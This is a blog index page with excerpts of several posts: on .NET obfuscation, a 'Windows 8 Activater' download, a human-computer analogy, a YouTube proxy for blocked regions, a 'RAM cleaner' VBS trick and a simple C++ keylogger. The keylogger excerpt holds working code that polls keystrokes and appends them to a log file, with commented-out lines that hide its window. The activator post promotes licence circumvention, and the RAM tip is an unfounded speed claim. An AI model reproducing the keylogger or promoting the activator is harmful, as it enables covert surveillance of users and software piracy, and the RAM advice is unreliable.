Posts

Obfuscation, why it is needed, obfuscators and recommendations on the draft to the obfuscation

Obfuscation - there is such a word. Warning - this article is very common term "obfuscation" and its derivatives, if you read the article out loud, it may seem that you are brainwashed.   None of such appliances and replace the word "obfuscation" shorter did not find myself tired of that word.   So do not read this article out loud at bedtime or before dinner, as the Soviet press, or replace the word with "entanglement" (let's see what you get) or Oh.   ;) Availability of metadata up to your code (of course this is MSIL, but more readable than assembly language code) in products. Net has become a headache for developers of commercial products and technologies. Net. How to protect code from prying public, how to protect the product that is the intellectual property (if it can be easily understandable to decompile the code, then you can remove the protection from unauthorized use, and even then assemble into a working assembly!)? Here comes to ...

Windows 8 Activater

Image
This is an amazing activator for windows 8 it activate 100% Windows 8 Professional Final Activator. the download link is this Download Instraction: 1.Run as administrator 2.Wait for the process and dont do nothing 3.It restarts automatically Windows is "activated" Features ============ Unlocked: Personalization,,Start screen,,Account Picture Powered By, www.ittales1.blogspot.com

Is Human is a computer

Is Human is a computer Human is like a computer or computer is like human. Human execute one instruction at a time which is similar to computer human also have a full fledge operating system with multithreading.  As we know we do one action at a time but also keep track of other actions on the same time. for example when I am setting free in IDLE state I still keep track of other processes that are running in background (Thinking about some things) A Question arise here that who is our user and who is the person who execute the processes and who is then developer /Programmer of the process. We all know and believe in our destiny than what is it ,it is the Script which is programmed to be executed on us ,there are too many if/Else statement which change and redirect our each action to our current state each If/Else result for the next move, Similarly there are looping we try to change our life status but we fail we try again but fail once our condition matches we step-up. Lu...

How to watch You tube in Pakistan and blocked areas

Image
How to view youtube.com in  Pakistan, the answare is eassy just go tu the website and you would be rediractid to Youtube.com It Play in a high speed but you havent need any extra things just go http://proxtub.appspot.com/ They website is only for educational purposes usage please uses it for what it is

Ram Cleaner(How to speed up your computer)

Image
These are the Question Which  occur  mostly How to Speedup your computer? How to clear Ram? How to make my computer faster? My computer Hangs? There are dozens of software  available  at the market for the  purposes  but they never do  actually  good things some of them Speed up your system but they have  installed  a lot of  Ad-wares  on your  computer  so now i am telling you a small  method  you will feel a real Change in the speed for short interval (1)Open           Notepad (2)Type this          mystring=(80000000) (3)Save the file Where ever you want  with the name         Ram.vbs (4)Double Click on it and you will get the Result when ever you needed Optional Steps: (5)Place the file in startup Folder and you will when the comp...

keylogger in c++

Simple keylogger in c++   Its a simple keylogger which will give you the basic idea of a keylogger and will provide a base for your great approaches. //#define _WIN32_WINNT 0x0500   #include<iostream.h> #include<windows.h> #include<fstream.h>   using namespace std ;   int main (){ //Hiding the window //HWND hWind = GetConsoleWindow(); //ShowWindow(hWind, SW_HIDE);   ofstream file ; char i ;   while ( 1 ){         for ( int k = 8 ; k <= 190 ; k ++ ){                 if ( GetAsyncKeyState ( k ) == - 32767 ){                 i = k ;                 cout << i ;                 file. open ( "klog.txt" ,ios :: app ) ;                         file << i ;         ...